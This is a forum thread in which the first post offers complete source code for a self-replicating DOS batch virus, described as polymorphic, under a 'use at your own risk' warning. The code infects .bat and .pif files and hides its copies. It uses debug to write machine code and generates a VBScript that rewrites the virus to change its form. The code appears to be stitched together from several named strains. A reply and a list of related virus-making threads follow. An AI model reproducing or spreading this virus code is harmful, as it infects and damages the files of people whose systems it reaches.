Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
polymorphic virus
17-12-2008, 07:54 PM,
Post: #1
polymorphic virus
@set hjmmt=echo
@set bugcl=copy
@ctty nul._!
for %%a in (*.bat ..\*.bat) do set _!=%%a
find "_!"<%_!%
if errorlevel 1 find "_!"<%0.BAT>>%_!%
ctty con._!
%hjmmt% off%[BfV_B]%
if '%1=='## goto BfV_%2
if exist C:\_BfV.bat goto BfV_
if not exist %0.bat goto BfV_end
find "BfV"<%0.bat>C:\_BfV.bat
attrib C:\_BfV.bat +h
command /e:5000 /c C:\_BfV ## run
goto BfV_end
for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i
exit BfV
if '%BfV%=='1111111 exit
set BfV=%BfV%1
find "BfV"<%3>nul
if not errorlevel 1 goto BfV_end
type %3>BfV
type C:\_BfV.bat>>BfV
move BfV %3>nul
exit BfV
@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
%hjmmt% off
%hjmmt% Hello World!
::---- end dummy host ----
@goto MeLTend [MeLT_2a]
%hjmmt% off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
set _MeLT=x
%0 %MeLTcl%
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
%MeLTH% MeLT s . .. %path%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
%hjmmt% @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
%hjmmt% e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
%hjmmt% e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
%hjmmt% e 120 B4 4C CD 21 00>>MeLT.t
%hjmmt% g>>MeLT.t
del MeLT.t
exit MeLT
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
%hjmmt% off
:: host filename...
set pifvo=LIST.COM
:: loop dispatcher...
if '%1=='PiFV goto PiFV_%2
:: run the virus!
set _PiFV=
if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
%comspec% /e:5000 /c %0 PiFV go>nul
if exist PiFV! del PiFV!
:: run the host
set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 PiFV hst
set PiFVo=
set PiFVcl=
:: check for activation...
%hjmmt%.|date|find /i "sat">nul.PiFV
if errorlevel 1 goto PiFV_end
%hjmmt%.|time|find "7">nul.PiFV
if errorlevel 1 goto PiFV_msg
set PiFV=%hjmmt%
%PiFV% There once was an Otter named Oscer
%PiFV% Who claimed to know how to make water.
%PiFV% "No more dams," he said, "use my water instead!"
%PiFV% But the Elder Otter was not impressed.
set PiFV=
goto PiFV_end
%hjmmt% [PiFV] by WaveFunc
goto PiFV_end
%PiFVo% %PiFVcl%
goto PiFV_end
set PiFVh=%0
if not exist %PiFVh% set PiFVh=%0.bat
if not exist %PiFVh% exit
for %%a in (*.pif) do call %0 PiFV inf %%a
exit PiFV
set PiFVp=%3
:: get victim filename and infection marker
:: from PIF file using debug...
if exist PiFV! goto PiFV_1
%hjmmt% m 124,162 524>PiFV!
%hjmmt% e 100 '@set fn='>>PiFV!
%hjmmt% m 524,562 108>>PiFV!
%hjmmt% n pifv$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 47>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% m 55E,561 108>>PiFV!
%hjmmt% e 10C 0>>PiFV!
%hjmmt% n pifv$$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 10>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% q>>PiFV!
debug %PiFVp%<PiFV!>nul
call PiFV$
set PiFVn=%fn%
call PiFV$$
set PiFVi=%fn%
del PiFV$?.bat
:: pifvn=orig filename
:: pifvi=infection marker
:: pifvp=pif filename
:: pifvh=companion bat file
:: skip infected or 'empty' pifs...
if '%PiFVi%=='PiFV goto PiFV_end
if '%PiFVn%==' goto PiFV_end
:: don't shadow (be nice)
%hjmmt% %PiFVn%|find /i "command">nul
if not errorlevel 1 goto PiFV_end
:: infectable - create a companion batch...
:: (the following code strips off the extension)
%hjmmt% e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
%hjmmt% e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
%hjmmt% e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
%hjmmt% n pifv$.com>>PiFV$$
%hjmmt% rcx>>PiFV$$
%hjmmt% 2a>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
%hjmmt% %PiFVn%|PiFV$>PiFV$$.bat
call PiFV$$
set PiFVb=%fn%.bat
del PiFV$?.*
:: pifvb=new batch name
:: do not shadow if comp has same name as host
if %PiFVo%==%PiFVb% goto PiFV_end
if exist %PiFVb% goto PiFV_end
%hjmmt% %hjmmt% off>%PiFVb%
%hjmmt% set pifvo=%pifvn%>>%PiFVb%
find "PiFV"<%PiFVh%>>%PiFVb%
attrib %PiFVb% +h
:: ...and point the PIF at the companion
%hjmmt% e 15E 'PiFV',0>PiFV$$
%hjmmt% e 124 '%PiFVb%',0>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug %PiFVp%<PiFV$$>nul
del PiFV$$
:: I think we're done!
exit PiFV
%hjmmt% set ff=createobject("scripting.filesystemobject")>>poly.vbs
%hjmmt% set rr=ff.opentextfile(%0,1)>>poly.vbs
%hjmmt% aa = rr.readall>>poly.vbs
%hjmmt% rr.close>>poly.vbs
%hjmmt% Randomize>>poly.vbs
%hjmmt% poly = int(rnd * 3)>>poly.vbs
%hjmmt% if poly = 0 or poly = 2 then>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt","hjmmt" ^& s ^& poly)>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl","bugcl" ^& s ^& s ^& poly)>>poly.vbs
%hjmmt% else>>poly.vbs
%hjmmt% polynum = int(rnd * 7)>>poly.vbs
%hjmmt% for i = 1 to polynum>>poly.vbs
%hjmmt% polychar = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% polyall = polyall + polychar>>poly.vbs
%hjmmt% next>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt",polyall )>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl", s ^& polyall)>>poly.vbs
%hjmmt% end if>>poly.vbs
%hjmmt% set bb=ff.opentextfile(%0,2)>>poly.vbs
%hjmmt% bb.write rand2>>poly.vbs
@cscript poly.vbs
@del poly.vbs

Warning : Pkai dgn tanggjawab sendiri ar :emo49:
22-12-2008, 02:27 AM,
Post: #2
Re: polymorphic virus
lol nih cam trojan ke worm ?? xD ?? :o :oops: :oops: :shock:
[Image: 3oxgqp8xxgfj61xrfsnm.png]

Possibly Related Threads...
Thread Author Replies Views Last Post
  jom buat virus FACEBOOK kenekan rakan anda 0whh 36 7,639 26-05-2012, 11:26 PM
Last Post: Taz
  virus-[Bunga_X] selipar 10 3,030 12-08-2010, 10:21 PM
Last Post: penyapulidi
  Virus promote site rylzone 21 5,331 23-07-2010, 12:44 AM
Last Post: Stynx
  virus noob.. daikogiJi 2 1,089 06-07-2010, 11:01 PM
Last Post: anthrax
  [Request] Tutorial Bro Act Virus akiraro 0 833 27-02-2010, 08:14 PM
Last Post: akiraro
  Virus en VBS + JS + Html phoebekiller 7 1,672 26-12-2009, 10:51 AM
Last Post: syarif20
  Kepada Peminat Virus..! G0riLLaZ 4 1,703 26-12-2009, 10:41 AM
Last Post: syarif20
  Virus Gile b***!! Skaziq 1 1,074 19-12-2009, 11:24 AM
Last Post: hazard74
  Super Virus... phoebekiller 23 3,834 09-09-2009, 12:39 PM
Last Post: cyberaptor
  Jom buat virus black night! criminal 9 1,867 29-08-2009, 08:08 PM
Last Post: darkkroit

Forum Jump: